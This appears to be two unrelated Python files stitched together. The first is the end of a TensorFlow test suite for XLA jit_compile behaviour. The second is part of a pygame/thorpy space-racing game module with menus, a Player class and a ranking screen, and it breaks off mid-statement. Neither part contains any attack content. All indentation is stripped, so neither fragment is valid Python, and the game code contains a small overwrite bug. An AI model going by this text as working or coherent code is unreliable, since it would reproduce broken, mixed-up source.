self.assertAllClose([40.0, 28.0], g(2.0))
self.assertAllClose(40.0, f.get_concrete_function(2.0)(2.0))
self.assertAllClose([40.0, 28.0], g.get_concrete_function(2.0)(2.0))
def testWhileLoopWithUnmodifiedCarriedShape(self):
with ops.device('device:{}:0'.format(self.device)):
signature = [tensor_spec.TensorSpec(shape=[None], dtype=dtypes.float32)]
# We define a signature that specifies unknown vector shape, then test
# that tf.shape constness gets properly propagated into the while_loop
# even when carried as part of the loop state.
@def_function.function(input_signature=signature, jit_compile=True)
def g(x):
return control_flow_ops.while_loop_v2(
lambda *_: True,
lambda y, shp: (y + random_ops.random_normal(shp)**2, shp),
(x, array_ops.shape(x)),
maximum_iterations=3)[0]
self.assertAllGreater(g(array_ops.zeros([7])), 0.)
def testNestedWhileLoopWithUnmodifiedCarriedShape(self):
with ops.device('device:{}:0'.format(self.device)):
signature = [tensor_spec.TensorSpec(shape=[None], dtype=dtypes.float32)]
@def_function.function(input_signature=signature, jit_compile=True)
def g(x):
def inner(z, shp):
return z + random_ops.random_normal(shp)**2, shp
def outer(y, shp):
y, shp = control_flow_ops.while_loop_v2(
lambda *_: True, inner, (y, shp), maximum_iterations=3)
y, shp = array_ops.identity_n([y, shp])
return control_flow_ops.while_loop_v2(
lambda *_: True, inner, (y, shp), maximum_iterations=5)
shp = array_ops.shape(x, name='x_shp')
return control_flow_ops.while_loop_v2(
lambda *_: True, outer, (x, shp), maximum_iterations=4)[0]
self.assertAllGreater(g(array_ops.zeros([7])), 0.)
def testNestedWhileLoopWithUnmodifiedCarriedShapeSlice(self):
with ops.device('device:{}:0'.format(self.device)):
signature = [
tensor_spec.TensorSpec(shape=[None, None], dtype=dtypes.float32)
]
@def_function.function(input_signature=signature, jit_compile=True)
def g(x):
def inner(z, shp):
return z + random_ops.random_normal(shp)**2, shp
def outer(y, shp):
y, shp = control_flow_ops.while_loop_v2(
lambda *_: True, inner, (y, shp), maximum_iterations=3)
return control_flow_ops.while_loop_v2(
lambda *_: True, inner, (y, shp), maximum_iterations=4)
shp = array_ops.shape(x, name='x_shp')
x = control_flow_ops.while_loop_v2(
lambda *_: True, outer, (x, shp), maximum_iterations=5)[0]
shp2 = array_ops.shape(x, name='x_shp_after')[1:]
w = control_flow_ops.while_loop_v2(
lambda *_: True,
outer, (array_ops.zeros_like(x[0]), shp2),
maximum_iterations=6)[0]
return x + w
self.assertAllGreater(g(array_ops.zeros([7, 13])), 0.)
def testMethodCompilation(self):
with ops.device('device:{}:0'.format(self.device)):
class C(object):
@def_function.function(jit_compile=True)
def f1(self, x, a):
return x + a
inputs = constant_op.constant([1, 2, 2, 3, 3])
c = C()
self.assertAllClose([2, 3, 3, 4, 4], c.f1(inputs, 1))
def testMethodCompilationUnsupportedFunc(self):
with ops.device('device:{}:0'.format(self.device)):
class C(object):
@def_function.function(jit_compile=True)
def f1(self, x):
return string_ops.string_length(
string_ops.string_format('{}', x))
inputs = constant_op.constant([1, 2, 2, 3, 3])
c = C()
with self.assertRaisesRegex(
errors.InvalidArgumentError, 'legalization failed'
if test_util.is_mlir_bridge_enabled() else 'unsupported operations'):
c.f1(inputs)
def testMustBeConstantPropagation(self):
if 'tpu' in self.device.lower():
self.skipTest('b/162799319: Cannot resolve constant on TPU')
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f():
return constant_op.constant([0, 2, 1], dtype=dtypes.int32)
@def_function.function(jit_compile=True)
def g(a, b):
return array_ops.transpose(a, b)
@def_function.function
def z():
return g(array_ops.ones([3, 4, 3], dtype=dtypes.float32), f())
z()
def testArgMinMax(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def argmax(x):
return math_ops.argmax(x)
@def_function.function(jit_compile=True)
def argmin(x):
return math_ops.argmin(x)
self.assertAllClose(0, argmax(array_ops.ones([10], dtype=dtypes.float32)))
self.assertAllClose(0, argmax(array_ops.ones([10])))
self.assertAllClose(0, argmin(array_ops.ones([10], dtype=dtypes.float32)))
self.assertAllClose(0, argmin(array_ops.ones([10])))
@test_util.disable_mlir_bridge('TensorArray support not implemented')
def testErrorMessagePassingTensorArray(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x):
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=1, element_shape=[])
ta = ta.write(0, 2 * x)
y = ta.read(0)
return y
x = constant_op.constant(3.14)
with backprop.GradientTape() as tape:
tape.watch(x)
with self.assertRaisesRegex(errors.UnimplementedError,
'TensorList crossing the XLA/TF boundary'):
y = f(x)
tape.gradient(y, x)
@test_util.disable_mlir_bridge('TODO(b/162281863): MLIR bridge errors out'
' lowering TensorListConcatV2')
def testTensorListConcatV2(self):
with ops.device('device:{}:0'.format(self.device)):
def f(x):
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=2, element_shape=[3])
ta = ta.write(0, 2 * x)
ta = ta.write(1, 3 * x)
return ta.concat()
compiled_f = def_function.function(jit_compile=True)(f)
inputs = constant_op.constant([3.14, 2.68, 7.69])
self.assertAllClose([6.28, 5.36, 15.38, 9.42, 8.04, 23.07], f(inputs))
self.assertAllClose(compiled_f(inputs), f(inputs))
@test_util.disable_mlir_bridge('TODO(b/162281863): MLIR bridge errors out'
' lowering TensorListConcatV2')
def testTensorListConcatV2Multidim(self):
with ops.device('device:{}:0'.format(self.device)):
def f(x):
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=2, element_shape=[3, 2])
ta = ta.write(0, 2 * x)
ta = ta.write(1, 3 * x)
return ta.concat()
compiled_f = def_function.function(jit_compile=True)(f)
inputs = constant_op.constant([[3.14, 21.1], [2.68, 22.2], [7.69, 23.3]])
self.assertAllClose(f(inputs), compiled_f(inputs))
@test_util.disable_mlir_bridge('TODO(b/162281863): MLIR bridge errors out'
' lowering TensorListConcatV2')
def testTensorListConcatV2Scalars(self):
with ops.device('device:{}:0'.format(self.device)):
def f(x):
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=2, element_shape=[1])
ta = ta.write(0, 2 * x)
ta = ta.write(1, 3 * x)
return ta.concat()
compiled_f = def_function.function(jit_compile=True)(f)
inputs = constant_op.constant([3.14])
self.assertAllClose(f(inputs), compiled_f(inputs))
@test_util.disable_mlir_bridge('TODO(b/162281863): MLIR bridge errors out'
' lowering TensorListConcatV2')
def testTensorListConcatGrad(self):
with ops.device('device:{}:0'.format(self.device)):
def f(x):
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=2, element_shape=[3])
ta = ta.write(0, 2 * x)
ta = ta.write(1, 3 * x)
return ta.concat()
def g():
x = constant_op.constant([3.14, 2.68, 7.69])
with backprop.GradientTape() as tape:
tape.watch(x)
y = f(x)
return tape.gradient(y, x)
compiled_g = def_function.function(jit_compile=True)(g)
self.assertAllClose([5.0, 5.0, 5.0], g())
self.assertAllClose(compiled_g(), g())
@test_util.disable_mlir_bridge('TODO(b/162281863): MLIR bridge errors out'
' lowering TensorListConcatV2')
def testTensorListConcatGradNestedCompile(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x):
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=2, element_shape=[3])
ta = ta.write(0, 2 * x)
ta = ta.write(1, 3 * x)
return ta.concat()
@def_function.function(jit_compile=True)
def g():
x = constant_op.constant([3.14, 2.68, 7.69])
with backprop.GradientTape() as tape:
tape.watch(x)
y = f(x)
out = tape.gradient(y, x)
return out
self.assertAllClose([5.0, 5.0, 5.0], g())
def testCumsum(self):
if 'tpu' in self.device.lower():
self.skipTest('b/162771302: 64bit rewrite of cumsum not supported')
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x):
return math_ops.cumsum(x)
f64_input = constant_op.constant([1.1, 2.2, 3.3], dtype=dtypes.float64)
self.assertAllClose([1.1, 3.3, 6.6], f(f64_input))
def testNoExcessiveRetracing(self):
with ops.device('device:{}:0'.format(self.device)):
inner_retracings = 0
@def_function.function(jit_compile=True)
def inner(a, b):
nonlocal inner_retracings
inner_retracings += 1
return a * b + a
def outer(a, b):
return inner(a, b)
func_input = random_ops.random_normal([10, 10])
for _ in range(2):
def_function.function(outer)(func_input, func_input)
self.assertEqual(inner_retracings, 1)
def testUpdateVariable(self):
with ops.device('device:{}:0'.format(self.device)):
v = variables.Variable([0.0, 0.0])
@def_function.function(jit_compile=True)
def f():
v.assign([3.1, 2.3])
f()
self.assertAllClose(v, [3.1, 2.3])
@test_util.disable_mlir_bridge('TODO(b/199737685): MLIR bridge does not'
'support tf.unique via jit_compile')
def testUniqueErrMsg(self):
if 'tpu' in self.device.lower():
self.skipTest('We do not check shapes on TPU')
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x, y):
return array_ops.unique(x).y + array_ops.unique(y).y
with self.assertRaisesRegex(errors.InvalidArgumentError,
'Fail to proof the equality'):
f(constant_op.constant([3.1, 3.2]),
constant_op.constant([3.3, 3.2]))
@test_util.disable_mlir_bridge('TODO(b/199737685): MLIR bridge does not'
'support tf.unique via jit_compile')
def testUniqueCompilability(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x):
return array_ops.unique(x).y
self.assertAllClose(f(constant_op.constant([3.1, 3.2, 3.2])), [3.1, 3.2])
def testUpdateVariableMemoryUsage(self):
with ops.device('device:{}:0'.format(self.device)):
on_gpu = 'gpu' in self.device.lower()
v = variables.Variable([3.1, 3.2])
@def_function.function(jit_compile=True)
def update_var(a, b):
v.assign_add(a * b)
arg1 = random_ops.random_normal([2])
arg2 = random_ops.random_normal([2])
gc.collect()
initial_usage = context.context().get_memory_info(
v.device)['current'] if on_gpu else 0
update_var(arg1, arg2)
gc.collect()
final_usage = context.context().get_memory_info(
v.device)['current'] if on_gpu else 0
self.assertEqual(initial_usage, final_usage)
@test_util.disable_mlir_bridge('MLIR does not support resource update for'
' signature with compile-time constant.')
def testUpdateVariableWithCompileTimeConstMemoryUsage(self):
with ops.device('device:{}:0'.format(self.device)):
on_gpu = 'gpu' in self.device.lower()
v = variables.Variable(random_ops.random_normal([1024, 1024]))
# test a signature of (compile-time const, arg, res_var). The compile-time
# const will be optimized away so that the kernel signature will become
# (arg, res_var).
@def_function.function(jit_compile=True)
def update_var(shape, arg):
v.assign_add(array_ops.broadcast_to(arg, shape))
arg = random_ops.random_normal([1])
gc.collect()
initial_usage = context.context().get_memory_info(
v.device)['current'] if on_gpu else 0
update_var(constant_op.constant([1024, 1024]), arg)
gc.collect()
final_usage = context.context().get_memory_info(
v.device)['current'] if on_gpu else 0
self.assertEqual(initial_usage, final_usage)
@test_util.disable_mlir_bridge('TODO(b/162381930): MLIR bridge renames '
' functions')
def testUpdateVariableInClass(self):
with ops.device('device:{}:0'.format(self.device)):
class C(object):
@def_function.function(jit_compile=True)
def update_var(self, a, b):
if not hasattr(self, 'v'):
self.v = variables.Variable(3.1)
self.v.assign_add(a * b)
c = C()
@def_function.function
def outer():
c.update_var(constant_op.constant(0.7), constant_op.constant(0.6))
outer()
self.assertAllClose(c.v, 3.52)
def testUpdateVariableMultipleOutputs(self):
with ops.device('device:{}:0'.format(self.device)):
v = variables.Variable(3.1)
@def_function.function(jit_compile=True)
def update_var(a, b):
v.assign_add(a * b)
return a * b + v
out = update_var(constant_op.constant(0.7), constant_op.constant(0.6))
self.assertAllClose(v, 3.52)
self.assertAllClose(out, 3.94)
def testReturnIdentity(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(a, b):
return (a, b)
a = random_ops.random_normal([10, 10])
b = random_ops.random_normal([10, 10])
on_gpu = 'gpu' in self.device.lower()
gc.collect()
initial_usage = context.context().get_memory_info(
b.backing_device)['current'] if on_gpu else 0
f(a, b)
gc.collect()
final_usage = context.context().get_memory_info(
b.backing_device)['current'] if on_gpu else 0
self.assertEqual(initial_usage, final_usage)
def testGetCompilerIrConstants(self):
if 'tpu' in self.device.lower():
self.skipTest('TPU generates different HLO')
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(a, b):
return array_ops.transpose(a, b)
a = array_ops.ones([3, 4, 3], dtype=dtypes.float32)
b = constant_op.constant([0, 2, 1], dtype=dtypes.int32)
self.assertIn('{1,2,0}',
f.experimental_get_compiler_ir(a, b)(stage='optimized_hlo'))
@test_util.disable_mlir_bridge('TODO(b/168732524): MLIR bridge does not '
' optimize single-element tuples to scalars')
def testGetCompilerIrResourceVars(self):
with ops.device('device:{}:0'.format(self.device)):
v = variables.Variable([3.1, 3.2])
@def_function.function(jit_compile=True)
def f(a, b):
v.assign_add(a * b)
a = random_ops.random_normal([2])
b = random_ops.random_normal([2])
self.assertIn('input_output_alias={ {}: (2, {}, may-alias) }',
f.experimental_get_compiler_ir(a, b)('optimized_hlo'))
def testGetCompilerIrNotCompiled(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function
def f(x):
return x + 1
a = random_ops.random_normal([10, 10])
with self.assertRaisesRegex(ValueError,
'marked with \'jit_compile'):
f.experimental_get_compiler_ir(a)()
def testGetCompilerIrNested(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x, a):
return x + a
@def_function.function(jit_compile=False)
def fn2(x, a):
fn.experimental_get_compiler_ir(x, a)()
return fn(x, a)
inputs = constant_op.constant([1, 2, 2, 3, 3])
with self.assertRaises(TypeError):
fn2(inputs, 1)
def testGetCompilerIrKwargs(self):
with ops.device('device:{}:0'.format(self.device)):
v = variables.Variable([0.1, 0.1])
@def_function.function(jit_compile=True)
def f(a, b):
return (a + b) * v
a = constant_op.constant([1.1, 1.1])
b = constant_op.constant([2.2, 2.2])
self.assertIn('multiply',
f.experimental_get_compiler_ir(b=a, a=b)(stage='hlo'))
def testGetCompilerIrDot(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(a, b):
return a + b
a = constant_op.constant([1.1, 1.1])
b = constant_op.constant([2.2, 2.2])
self.assertIn(
'label',
f.experimental_get_compiler_ir(a, b)(stage='optimized_hlo_dot'))
def testGetCompilerIrNoDevicePlacement(self):
if 'gpu' not in self.device.lower():
self.skipTest('Testing get_compiler_ir on GPUs without placement')
@def_function.function(jit_compile=True)
def f(a, b):
return a + b
a = constant_op.constant([1.1, 1.1])
b = constant_op.constant([2.2, 2.2])
self.assertIn(
'label',
f.experimental_get_compiler_ir(a, b)(stage='optimized_hlo_dot'))
def testGetCompilerIrNonTensors(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(l):
return l[0] + l[1]
l = [constant_op.constant(1.1), constant_op.constant(2.2)]
self.assertIn('tuple',
f.experimental_get_compiler_ir(l)())
def testGetCompilerIrSerialized(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x):
return x - x
inputs = constant_op.constant([1, 2, 2, 3, 3])
for stage in ('hlo_serialized', 'optimized_hlo_serialized'):
hlo = fn.experimental_get_compiler_ir(inputs)(
stage=stage, device_name=f'/device:{self.device}:0')
self.assertIsInstance(hlo, bytes)
def testDotOptimizedHlo(self):
with ops.device('device:{}:0'.format(self.device)):
a = random_ops.random_normal([100, 100])
b = random_ops.random_normal([100, 100])
@def_function.function(jit_compile=True)
def f(a, b):
return math_ops.matmul(a, b)
self.assertRegex(f.experimental_get_compiler_ir(a, b)('optimized_hlo'),
'(dot)|(convolution)')
def testConstantOnWrongDevice(self):
with ops.device('device:{}:0'.format(self.device)):
s = random_ops.random_uniform([2], 1, 10, dtypes.int32)
l = random_ops.random_normal([s[0] * s[1]])
@def_function.function(jit_compile=True)
def f(l):
return array_ops.reshape(l, s)
self.assertIn('tuple',
f.experimental_get_compiler_ir(l)())
@test_util.disable_mlir_bridge('TODO(b/172845417): MLIR bridge does not '
'support getting constants out of resources')
def testGetConstantOutOfResourceVariable(self):
with ops.device('device:{}:0'.format(self.device)):
# Use floats to force device placement.
a = variables.Variable(50.0)
b = variables.Variable(2.0)
@def_function.function(jit_compile=True)
def f(x):
return array_ops.reshape(
x, [math_ops.cast(a, dtypes.int32),
math_ops.cast(b, dtypes.int32)])
# OK since the value is known at compile time.
out = f(random_ops.random_normal([10, 10]))
self.assertEqual(out.shape[0], 50)
self.assertEqual(out.shape[1], 2)
@test_util.disable_mlir_bridge('TODO(b/172845417): MLIR bridge does not '
'support getting constants out of resources')
def testGetConstantOutOfResourceVariableAfterWrite(self):
with ops.device('device:{}:0'.format(self.device)):
# Use floats to force device placement.
a = variables.Variable(50.0)
b = variables.Variable(2.0)
@def_function.function(jit_compile=True)
def f(x, val1, val2):
a.assign(math_ops.cast(val1, dtypes.float32))
b.assign(math_ops.cast(val2, dtypes.float32))
return array_ops.reshape(
x, [math_ops.cast(a, dtypes.int32),
math_ops.cast(b, dtypes.int32)])
val1 = constant_op.constant(2)
val2 = constant_op.constant(50)
# Returns an error, since the value known at compile time was overriden.
with self.assertRaisesRegex(errors.InvalidArgumentError,
'concrete values at compile time'):
f(random_ops.random_normal([10, 10]), val1, val2)
@test_util.disable_mlir_bridge('TODO(b/172845417): MLIR bridge does not '
'support getting constants out of resources')
def testGetConstantOutOfResourceVariableBeforeWrite(self):
with ops.device('device:{}:0'.format(self.device)):
# Use floats to force device placement.
a = variables.Variable(50.0)
b = variables.Variable(2.0)
@def_function.function(jit_compile=True)
def f(x, val1, val2):
out = array_ops.reshape(
x, [math_ops.cast(a, dtypes.int32),
math_ops.cast(b, dtypes.int32)])
a.assign(math_ops.cast(val1, dtypes.float32))
b.assign(math_ops.cast(val2, dtypes.float32))
return out
val1 = constant_op.constant(2)
val2 = constant_op.constant(50)
# OK since the write happens after the reshape.
out = f(random_ops.random_normal([10, 10]), val1, val2)
self.assertEqual(out.shape[0], 50)
self.assertEqual(out.shape[1], 2)
def testTfAssert(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x):
control_flow_ops.Assert(x == 1, ['Wrong value'])
f(constant_op.constant(1))
def testTensorArrayErrorMessage(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f():
# The error message as old and new bridge differ in which op they flag.
# The one points to the creation of the unitialized tensor array, the
# other is the use of the unitialized tensor array.
ta = tensor_array_ops.TensorArray( # EXPECTED_MESSAGE_NEW
dtype=dtypes.float32,
size=2,
dynamic_size=True,
element_shape=(None,))
return ta.concat() # EXPECTED_MESSAGE_OLD
if test_util.is_mlir_bridge_enabled():
with self.assertRaisesRegex(errors.InvalidArgumentError,
'EXPECTED_MESSAGE_NEW'):
f()
else:
with self.assertRaisesRegex(errors.InvalidArgumentError,
'EXPECTED_MESSAGE_OLD'):
f()
def testCounter(self):
cell_nojit = def_function._tf_function_counter.get_cell('0')
cell_jit = def_function._tf_function_counter.get_cell('1')
orig_nojit = cell_nojit.value()
orig_jit = cell_jit.value()
with ops.device('device:{}:0'.format(self.device)):
@def_function.function
def f(a):
return a + a
f(constant_op.constant(1))
self.assertEqual(cell_nojit.value(), orig_nojit + 1)
self.assertEqual(cell_jit.value(), orig_jit)
f(constant_op.constant(1.)) # Calling again does not increment
self.assertEqual(cell_nojit.value(), orig_nojit + 1)
@def_function.function(jit_compile=True)
def f1(a):
return a + a
f1(constant_op.constant(1))
self.assertEqual(cell_nojit.value(), orig_nojit + 1)
self.assertEqual(cell_jit.value(), orig_jit + 1)
@def_function.function
def f2(a):
@def_function.function
def g(a):
return a + a
@def_function.function(jit_compile=True)
def h(a):
return a + a
return g(a) + h(a)
f2(constant_op.constant(1))
self.assertEqual(cell_nojit.value(), orig_nojit + 2)
self.assertEqual(cell_jit.value(), orig_jit + 2)
@def_function.function(jit_compile=True)
def f3(a):
@def_function.function
def g(a):
return a + a
@def_function.function(jit_compile=True)
def h(a):
return a + a
return g(a) + h(a)
f3(constant_op.constant(1))
self.assertEqual(cell_nojit.value(), orig_nojit + 2)
self.assertEqual(cell_jit.value(), orig_jit + 3)
@test_util.disable_mlir_bridge('TODO(b/162272821): MLIR bridge returns '
' wrong status type')
def testResourceWrongDevice(self):
if 'gpu' not in self.device.lower():
self.skipTest('Need a GPU to have non-trivial device placement')
with ops.device('device:CPU:0'):
v = variables.Variable([3.1, 3.2])
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(experimental_compile=True)
def update_var(a):
v.assign_add(a)
arg = random_ops.random_normal([2])
with self.assertRaisesRegex(errors.InvalidArgumentError,
'Trying to access resource .*'):
update_var(arg)
def testMustBeConstantInsideCondition(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x, d):
if math_ops.reduce_all(
math_ops.greater(x, random_ops.random_normal([10, 10]))):
return array_ops.reshape(x * 2, constant_op.constant([100]))
else:
return array_ops.reshape(x * 3, d)
f(random_ops.random_normal([10, 10]), constant_op.constant([100]))
def testConditionalGradientTapeMathRegression(self):
with ops.device('device:{}:0'.format(self.device)):
with backprop.GradientTape():
@def_function.function(jit_compile=True, autograph=False)
def f(x):
return control_flow_ops.cond(
math_ops.reduce_all(x > 1), lambda: 1. / x, lambda: x)
v = variables.Variable([[2.]])
self.assertAllClose(f(v), constant_op.constant([[0.5]]))
@test_util.disable_mlir_bridge('TODO(b/190444466): MLIR bridge seems to '
'ignore resource assignments')
def testErrMsgAssignWrongShape(self):
with ops.device('device:{}:0'.format(self.device)):
v = variables.Variable([3.1, 3.2])
@def_function.function(jit_compile=True)
def f(samples):
v.assign(array_ops.zeros(samples)) # assignment
with self.assertRaisesRegex(
errors.InvalidArgumentError,
'Shape .* cannot be changed after initialization'):
f(constant_op.constant(6))
with self.assertRaisesRegex(errors.InvalidArgumentError, 'assignment'):
f(constant_op.constant(6))
def testTfSummaryErrMsg(self):
if 'gpu' not in self.device.lower():
self.skipTest('Only runs on GPU')
with ops.device('device:{}:0'.format(self.device)):
writer = summary_ops_v2.create_file_writer(self.get_temp_dir())
@def_function.function(jit_compile=True)
def my_func_temp():
with writer.as_default():
summary_ops_v2.scalar('my_metric', 0.5, step=10)
with self.assertRaisesRegex(errors.InvalidArgumentError,
'Trying to access resource .*'):
my_func_temp()
def testSinglePassArgmax(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x):
return math_ops.argmax(x)
hlo = f.experimental_get_compiler_ir(
array_ops.ones([10], dtype=dtypes.float32))(
stage='hlo')
# Test that reduction occurs only once.
self.assertGreater(hlo.count('reduce'), 1)
if __name__ == '__main__':
ops.enable_eager_execution()
test.main()
|
|
import random
import pygame
from pygame.math import Vector3 as V3
import thorpy
import parameters, drawing, light, camera
import alphabet, scenario
from garage import get_vessel_element
wordgen1 = alphabet.Dictionnary("thorn.txt","thorn_precisions.txt")
namel = 3
nameL = 8
def get_etitle(name,rect="screen"):
e = thorpy.make_text(name,thorpy.style.FONT_SIZE+8,(255,255,0))
e.stick_to(rect,"top","top")
e.move((0,20))
return e
def get_eok(name, rect="screen"):
e = thorpy.make_button(name,thorpy.functions.quit_menu_func)
e.stick_to(rect,"bottom","bottom")
e.move((0,-20))
return e
def refresh_ranking():
parameters.players.sort(key=lambda x:x.points, reverse=True)
for i,p in enumerate(parameters.players):
p.ranking = i+1
def get_display_options():
varset = thorpy.VarSet()
varset.add("aa", True, "Anti-aliasing: ")
varset.add("visibility", parameters.VISIBILITY, "Max display distance: ", [200,3000])
e = thorpy.ParamSetterLauncher.make([varset], "Display options", "Display options")
return e, varset
def launch_ingame_options():
thorpy.set_theme("classic")
def func():
parameters.scene.refresh_display()
box.blit()
pygame.display.flip()
e, varset = get_display_options()
e2 = thorpy.make_button("Show help",scenario.launch_help,{"func":func})
def leave():
if thorpy.launch_binary_choice("Are you sure?"):
parameters.scene.abandon = True
thorpy.functions.quit_menu_func()
func()
q = thorpy.make_button("Abandon",leave)
box = thorpy.make_ok_box([thorpy.make_text("Pause"),thorpy.Line.make(100,"h"), e,e2,q])
box.e_ok.user_func = thorpy.functions.quit_menu_func
box.e_ok.user_params = {}
## boxletter.set_main_color((200,200,200,50))
box.set_main_color((200,200,255,200))
box.center()
scenario.launch(box)
parameters.scene.cam.set_aa(varset.get_value("aa"))
parameters.VISIBILITY = varset.get_value("visibility")
thorpy.set_theme(parameters.THEME)
## varset = thorpy.VarSet()
## varset.add("name", name, "Name: ")
## varset.add("type", ["Human","Beginner", "Normal", "Hard"],
## "Type: ")
## color=(0,255,0) if name=="Player 1" else (0,0,255)
## varset.add("color", color, "Color: ")
## e = thorpy.ParamSetterLauncher.make([varset], name, name+" options")
## return varset, e
## ps = thorpy.ParamSetterLauncher()
## e = thorpy.Box()
def get_category(position):
k = parameters.NPLAYERS // 3
if position < k:
return parameters.CATEGORIES[0],3
elif position < 2*k:
return parameters.CATEGORIES[1],2
return parameters.CATEGORIES[2],1
class Player:
def __init__(self, name=None, color=None, money=1000, ranking=None, points=None):
self.name = name
if name is None:
self.name = wordgen1.genWord(random.randint(namel,nameL))
#
self.color = color
if color is None:
self.color = light.Material(random.choice(drawing.colors))
self.money = money
self.vessel = None
self.ranking = ranking
self.points = points
if self.points is None:
self.points = random.randint(0,parameters.NPLAYERS)
def get_element(self,prename=""):
fs = thorpy.style.FONT_SIZE
ename = thorpy.make_text(prename+self.name,fs+4,(255,0,0))
emoney = thorpy.make_text("Money: "+str(self.money))
eranking = thorpy.make_text("Intergalactic Ranking: "+str(self.ranking))
eranking = thorpy.make_text("Intergalactic Points: "+str(self.points))
box = thorpy.Box.make([ename,emoney,eranking])
return box
def get_nearest_players(self):
refresh_ranking()
for i,p in enumerate(parameters.players):
if p is self:
print(i)
if i == parameters.NPLAYERS-1:
p1 = parameters.players[i-2]
p2 = parameters.players[i-1]
elif i == 0:
p1 = parameters.players[1]
p2 = parameters.players[2]
else:
p1 = parameters.players[i-1]
p2 = parameters.players[i+1]
assert p1 is not p2
return p1,p2
raise Exception("Couldnt find nearest players")
class ShowRanking:
def __init__(self, title, ok_text, ranking, results=False, choosevessel=False):
refresh_ranking()
#
light_pos = V3(0,1000,-1000)
light_m = V3(20,20,20)
light_M = V3(200,200,200)
self.light = light.Light(light_pos, light_m, light_M)
self.viewport = pygame.Surface((400,int(parameters.H*0.6)))
self.viewport_color = (200,200,200)
self.viewport.fill(self.viewport_color)
self.viewport_rect = pygame.Rect((0,0),self.viewport.get_size())
self.viewport_rect.centerx = parameters.W // 2 + 100
self.viewport_rect.centery = parameters.H//2
self.cam = camera.Camera(self.viewport, fov=512, d=2, objs=[])
self.screen = thorpy.get_screen()
self.displayed_vessel = None
self.i = 0
#
if results:
ranking[0].points += 1
ranking[0].money += 300 + (parameters.NPLAYERS-ranking[0].ranking)*100
ranking[2].points -= 1
ranking[2].money += 100
ranking[1].money += 200
if ranking[2].points < 0: ranking[2].points = 0
#
self.trophy = None
if choosevessel:
self.e_players = []
def other_vessel():
self.vessels[0] = create_vessel(parameters.HERO_COLOR)
self.vessels[0].set_pos(V3(0,-1*4.5,20))
self.vessels[0].move(V3(0,4,0))
self.displayed_vessel = self.vessels[0]
#replace self.ve
new_ve = get_vessel_element(self.vessels[0])
self.e_bckgr.replace_element(self.ve, new_ve)
thorpy.functions.refresh_current_menu()
self.ve = new_ve
self.e_bckgr.unblit_and_reblit()
b = thorpy.make_button("Generate another vessel", other_vessel)
c = thorpy.make_button("Done", thorpy.functions.quit_menu_func)
self.e_players.append(b)
self.e_players.append(c)
from main import create_vessel
self.vessels = [create_vessel(parameters.HERO_COLOR)]
self.displayed_vessel = self.vessels[0].get_copy()
self.ve = get_vessel_element(self.vessels[0])
self.e_players.append(self.ve)
else:
if results:
self.e_players = [p.get_element(str(i+1)+") ") for i,p in enumerate(ranking)]
else:
self.e_players = [p.get_element() for i,p in enumerate(ranking)]
self.vessels = [p.vessel.get_copy() for p in ranking]
if results:
import core3d
from light import Material
self.trophy = core3d.Object3D("trophy1.stl")
self.trophy.set_color(Material((255,215,0)))
## self.trophy.set_color((255,255,0))
self.trophy.set_pos(V3(5.,-0*4.5-0.2,15))
self.trophy.rotate_around_center_z(90.)
self.trophy.rotate_around_center_x(-65.)
self.trophy.move(V3(0,4,0))
self.background = thorpy.load_image("background1.jpg")
self.background = thorpy.get_resized_image(self.background,
(parameters.W,parameters.H//2),
type_=max)
self.e_bckgr = thorpy.Background.make(image=self.background,
elements=self.e_players)
#
vw,vh = self.viewport_rect.size
self.e_viewport_frame = thorpy.Element()
painter = thorpy.painterstyle.ClassicFrame((vw+3,vh+3),
color=self.viewport_color,
pressed=True)
self.e_viewport_frame.set_painter(painter)
self.e_viewport_frame.finish()
self.e_viewport_frame.set_center(self.viewport_rect.center)
#
reaction = thorpy.ConstantReaction(thorpy.THORPY_EVENT,
self.refresh_display,
{"id":thorpy.constants.EVENT_TIME})
self.e_bckgr.add_reaction(reaction)
if not choosevessel:
for i,v in enumerate(self.vessels):
pos = self.e_players[i].get_fus_rect().center
v.set_pos(V3(0,-i*4.5,20))
v.move(V3(0,4,0))
else:
self.vessels[0].set_pos(V3(0,-1*4.5,20))
self.vessels[0].move(V3(0,4,0))
#
self.displayed_vessel.set_pos(V3(0,-1*4.5,20))
self.displayed_vessel.move(V3(0,4,0))
#
thorpy.store(self.e_bckgr,gap=40)
for e in self.e_players:
e.stick_to(self.viewport_rect,"left","right",align=False)
e.move((-5,0))
self.e_title = get_etitle(title)
if not choosevessel:
self.e_ok = get_eok(ok_text)
self.e_bckgr.add_elements([self.e_viewport_frame,self.e_title,self.e_ok])
else:
self.e_bckgr.add_elements([self.e_viewport_frame,self.e_title])
self.goback = False
def return_garage():
self.derotate()
self.goback=True
thorpy.functions.quit_menu_func()
if not results and not choosevessel:
